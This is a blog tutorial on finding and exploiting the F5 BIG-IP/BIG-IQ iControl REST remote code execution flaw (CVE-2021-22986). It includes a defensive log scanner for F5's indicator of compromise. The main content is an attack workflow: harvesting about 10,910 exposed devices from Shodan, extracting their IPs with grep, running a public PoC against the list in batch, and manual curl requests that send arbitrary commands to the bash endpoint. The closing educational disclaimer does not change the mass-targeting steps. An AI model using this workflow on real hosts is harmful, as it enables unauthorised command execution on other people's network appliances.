Finding and exploiting iControl REST unauthenticated RCE [CVE-2021-22986]

On March 10, F5 released an advisory about an unauthenticated RCE in iControl REST. Their report states that any unauthenticated user can execute arbitrary system commands, create or delete files, or disable services.

Vulnerable/affected versions are:

  • F5 BIG-IQ 6.0.0–6.1.0
  • F5 BIG-IQ 7.0.0–
  • F5 BIG-IQ 7.1.0–
  • F5 BIG-IP 12.1.0–
  • F5 BIG-IP 13.1.0–
  • F5 BIG-IP 14.1.0–
  • F5 BIG-IP 15.1.0–15.1.2
  • F5 BIG-IP 16.0.0–16.0.1

There is no specific way to directly identify a vulnerable device or network, so we will use a simple BIG-IP detection method to find systems potentially impacted by CVE-2021-22986.

Alternatively, we can use the indicator of compromise (IoC) to detect potentially vulnerable devices. F5 described in their article that an affected device will contain this text in /var/log/restjavad*.log:

"X-F5-Auth-Token doesn't have value"
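As an added example (not part of the original article), a small Python scanner that walks /var/log/restjavad*.log, rotated files included, for the indicator F5 published; the log line layout in the sample is constructed, only the indicator text comes from F5, and hits should be triaged as exploitation attempts against the device rather than taken as proof that it is vulnerable.

```python
"""Scan restjavad logs for the CVE-2021-22986 indicator published by F5."""
import glob
import re
from dataclasses import dataclass
from typing import Iterable, List

# Indicator text from F5's advisory (quoted in the article); the blog copy
# carries a curly apostrophe, so input is normalised to a straight one first.
IOC_TEXT = "X-F5-Auth-Token doesn't have value"

# Path pattern from the article; also catches rotated restjavad.N.log files.
DEFAULT_LOG_GLOB = "/var/log/restjavad*.log"

# Constructed sample: the bracketed layout is an assumption for demonstration.
SAMPLE_LOG = """\
[INFO][10 Mar 2021 12:00:01 UTC][RestWorker] starting
[WARNING][10 Mar 2021 12:04:17 UTC][RestOperationIdentifier] X-F5-Auth-Token doesn't have value
[INFO][10 Mar 2021 12:04:18 UTC][RestWorker] task created
[WARNING][10 Mar 2021 12:04:19 UTC][RestOperationIdentifier] X-F5-Auth-Token doesn't have value
"""

# Second bracketed field of a line, assumed to be the timestamp.
TIMESTAMP_RE = re.compile(r"\]\[([^\]]+)\]")


@dataclass
class Hit:
    source: str
    line_no: int
    timestamp: str
    line: str


def find_ioc_hits(lines: Iterable[str], source: str = "<memory>") -> List[Hit]:
    """Return one Hit per line that contains the F5 indicator text."""
    hits: List[Hit] = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\n").replace("\u2019", "'")
        if IOC_TEXT not in line:
            continue
        m = TIMESTAMP_RE.search(line)
        hits.append(Hit(source, n, m.group(1) if m else "", line))
    return hits


def scan_log_files(pattern: str = DEFAULT_LOG_GLOB) -> List[Hit]:
    """Collect hits from every file matching the glob (empty off a BIG-IP)."""
    hits: List[Hit] = []
    for path in sorted(glob.glob(pattern)):
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits.extend(find_ioc_hits(fh, source=path))
    return hits


if __name__ == "__main__":
    hits = scan_log_files() or find_ioc_hits(SAMPLE_LOG.splitlines(), "sample")
    for h in hits:
        print(f"{h.source}:{h.line_no} [{h.timestamp}] {h.line}")
```

Run it on the BIG-IP itself (or on collected log copies by passing another glob); with no restjavad logs present it falls back to the constructed sample.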

We can use Shodan to find potentially vulnerable devices, using the same filter we use to detect BIG-IP devices on Shodan.


Shodan shows 10,910 devices; not all of them are vulnerable. We will detect and exploit the vulnerability using a simple proof of concept written by Al1ex. The PoC contains Chinese text; here is the translated version. We can either download all the results or use the Shodan CLI to scan for this CVE. First, let's start with the downloaded Shodan results.

We can download the results using the download results button. After downloading the results and the PoC, let's start detecting the vulnerability with it. Typing python3 -h shows the help menu.

On the help menu there is an option described as batch detection:

python3  -s true -f filename

First, let's filter the IPs out of the results we downloaded from Shodan; we can do that with grep and a regex in our Linux shell.

cat shodan_file | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

Save the output to a file; now it's time to start the scan.

After detection you can use  to execute commands on the target system without writing the full exploit command again and again.

You can also exploit this vulnerability manually using these steps:

Step-1: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"[command-to-execute]"}'

Step-2: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"[command-to-execute]"}'

Step-3: curl -su admin: -H "Content-Type: application/json" http://[target-ip]:8100/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c [command-to-execute]"}'

Using the automated exploit is much faster for detection and exploitation; manual exploitation is slow and takes more time to test a list.

You can use this to find a P1 on your bug bounty program if any of their BIG-IP products is vulnerable to this same issue.

Nuclei Detection Script: CVE-2021-22986.yaml

[Disclaimer: the IP I tested and exploited was my own local Docker IP; please do not exploit or test others' IPs without permission. This article is for educational purposes only.]




Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

Joy Ghosh